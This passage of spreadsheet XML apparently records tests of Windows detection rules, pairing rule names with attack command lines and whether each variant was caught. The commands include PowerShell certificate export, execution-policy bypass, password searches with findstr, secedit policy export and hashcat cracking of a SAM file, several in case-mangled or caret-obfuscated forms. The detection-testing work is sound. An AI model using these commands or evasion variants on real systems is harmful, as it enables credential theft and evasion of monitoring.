      <c r="A410" s="43" t="n"/>
      <c r="B410" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C410" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D410" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E410" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -COmMand "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F410" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G410" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H410" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I410" s="43" t="n"/>
      <c r="J410" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K410" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="411" ht="15.75" customHeight="1" s="42">
      <c r="A411" s="44" t="n"/>
      <c r="B411" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C411" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D411" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E411" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F411" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G411" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H411" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I411" s="43" t="n"/>
      <c r="J411" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K411" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="412" ht="15.75" customHeight="1" s="42">
      <c r="A412" s="44" t="n"/>
      <c r="B412" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C412" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D412" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E412" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmaND "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F412" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G412" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H412" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I412" s="43" t="n"/>
      <c r="J412" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K412" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="413" ht="15.75" customHeight="1" s="42">
      <c r="A413" s="44" t="n"/>
      <c r="B413" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C413" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D413" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E413" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommAnD "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F413" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G413" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H413" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I413" s="43" t="n"/>
      <c r="J413" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K413" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="414" ht="15.75" customHeight="1" s="42">
      <c r="A414" s="44" t="n"/>
      <c r="B414" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C414" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D414" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E414" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificatet-FilePath C:\\temp\\cert.pfx\"</t>
        </is>
      </c>
      <c r="F414" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G414" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H414" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I414" s="44" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e)</t>
        </is>
      </c>
      <c r="J414" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K414" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="415" ht="15.75" customHeight="1" s="42">
      <c r="A415" s="44" t="n"/>
      <c r="B415" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C415" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D415" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E415" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificatet-FilePath C:\\temp\\cert.pfx\"</t>
        </is>
      </c>
      <c r="F415" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G415" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H415" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I415" s="44" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e)</t>
        </is>
      </c>
      <c r="J415" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K415" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="416" ht="15.75" customHeight="1" s="42">
      <c r="A416" s="44" t="n"/>
      <c r="B416" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C416" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D416" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E416" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAND "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificatet-FilePath C:\\temp\\cert.pfx\"</t>
        </is>
      </c>
      <c r="F416" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G416" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H416" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I416" s="44" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e)</t>
        </is>
      </c>
      <c r="J416" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K416" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="417" ht="15.75" customHeight="1" s="42">
      <c r="A417" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B417" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C417" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D417" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E417" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F417" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G417" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H417" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I417" s="43" t="n"/>
      <c r="J417" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K417" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="418" ht="15.75" customHeight="1" s="42">
      <c r="A418" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B418" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C418" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D418" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E418" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F418" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G418" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H418" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I418" s="43" t="n"/>
      <c r="J418" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K418" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="419" ht="15.75" customHeight="1" s="42">
      <c r="A419" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B419" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C419" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D419" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E419" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F419" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G419" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H419" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I419" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J419" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K419" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="420" ht="15.75" customHeight="1" s="42">
      <c r="A420" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B420" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C420" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D420" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E420" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F420" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G420" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H420" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I420" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J420" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K420" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="421" ht="15.75" customHeight="1" s="42">
      <c r="A421" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B421" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C421" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D421" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E421" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F421" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G421" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H421" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I421" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J421" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K421" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="422" ht="15.75" customHeight="1" s="42">
      <c r="A422" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B422" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C422" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D422" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E422" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F422" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G422" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H422" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I422" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J422" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K422" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="423" ht="15.75" customHeight="1" s="42">
      <c r="A423" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B423" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C423" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D423" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E423" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F423" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G423" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H423" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I423" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J423" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K423" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="424" ht="15.75" customHeight="1" s="42">
      <c r="A424" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B424" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C424" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D424" s="44" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E424" s="44" t="inlineStr">
        <is>
          <t>secedit.exe -export /areas SECURITYPOLICY -cfg output_mysecpol.txt</t>
        </is>
      </c>
      <c r="F424" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G424" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H424" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I424" s="44" t="n"/>
      <c r="J424" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K424" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="425" ht="15.75" customHeight="1" s="42">
      <c r="A425" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B425" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C425" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D425" s="44" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E425" s="44" t="inlineStr">
        <is>
          <t>secedit.exe "/configure" /db mytemplate.db</t>
        </is>
      </c>
      <c r="F425" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G425" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H425" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I425" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J425" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K425" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="426" ht="15.75" customHeight="1" s="42">
      <c r="A426" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B426" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C426" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D426" s="44" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E426" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c secedit.exe /exp^ort /areas SECURITYPOLICY /cfg output_mysecpol.txt</t>
        </is>
      </c>
      <c r="F426" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G426" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H426" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I426" s="43" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J426" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K426" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="427" ht="15.75" customHeight="1" s="42">
      <c r="A427" s="43" t="n"/>
      <c r="B427" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C427" s="44" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D427" s="44" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E427" s="43" t="inlineStr">
        <is>
          <t>findstr.exe -si "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F427" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G427" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H427" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I427" s="43" t="n"/>
      <c r="J427" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K427" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="428" ht="15.75" customHeight="1" s="42">
      <c r="A428" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B428" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C428" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D428" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E428" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F428" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G428" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H428" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I428" s="43" t="n"/>
      <c r="J428" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K428" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="429" ht="15.75" customHeight="1" s="42">
      <c r="A429" s="44" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B429" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C429" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D429" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E429" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F429" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G429" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H429" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I429" s="43" t="n"/>
      <c r="J429" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K429" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="430" ht="15.75" customHeight="1" s="42">
      <c r="A430" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B430" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C430" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D430" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E430" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F430" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G430" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H430" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I430" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J430" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K430" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="431" ht="15.75" customHeight="1" s="42">
      <c r="A431" s="44" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B431" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C431" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D431" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E431" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F431" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G431" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H431" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I431" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J431" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K431" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="432" ht="15.75" customHeight="1" s="42">
      <c r="A432" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B432" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C432" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D432" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E432" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F432" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G432" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H432" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I432" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J432" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K432" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="433" ht="15.75" customHeight="1" s="42">
      <c r="A433" s="44" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B433" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C433" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D433" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E433" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F433" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G433" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H433" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I433" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J433" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K433" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="434" ht="15.75" customHeight="1" s="42">
      <c r="A434" s="44" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B434" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C434" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D434" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E434" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F434" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G434" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H434" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I434" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J434" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K434" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="435" ht="15.75" customHeight="1" s="42">
      <c r="A435" s="44" t="inlineStr">
        <is>
          <t>t1110.002</t>
        </is>
      </c>
      <c r="B435" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_hashcat</t>
        </is>
      </c>
      <c r="C435" s="44" t="inlineStr">
        <is>
          <t>HackTool - Hashcat Password Cracker Execution</t>
        </is>
      </c>
      <c r="D435" s="44" t="inlineStr">
        <is>
          <t>39b31e81-5f5f-4898-9c0e-2160cfc0f9bf</t>
        </is>
      </c>
      <c r="E435" s="44" t="inlineStr">
        <is>
          <t>C:\AtomicRedTeam\atomics\..\ExternalPayloads\hashcat6\hashcat-6.1.1\hashcat.exe --attack-mode 0 -m 1000 -r .
ules\Incisive-leetspeak.rule C:\AtomicRedTeam\atomics\T1110.002\src\sam.txt C:\AtomicRedTeam\atomics\T1110.002\src\password.lst</t>
        </is>
      </c>
      <c r="F435" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G435" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H435" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I435" s="43" t="n"/>
      <c r="J435" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K435" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="436" ht="15.75" customHeight="1" s="42">
      <c r="A436" s="44" t="inlineStr">
        <is>
          <t>t1110.002</t>
        </is>
      </c>
      <c r="B436" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_hashcat</t>
        </is>
      </c>
      <c r="C436" s="44" t="inlineStr">
        <is>
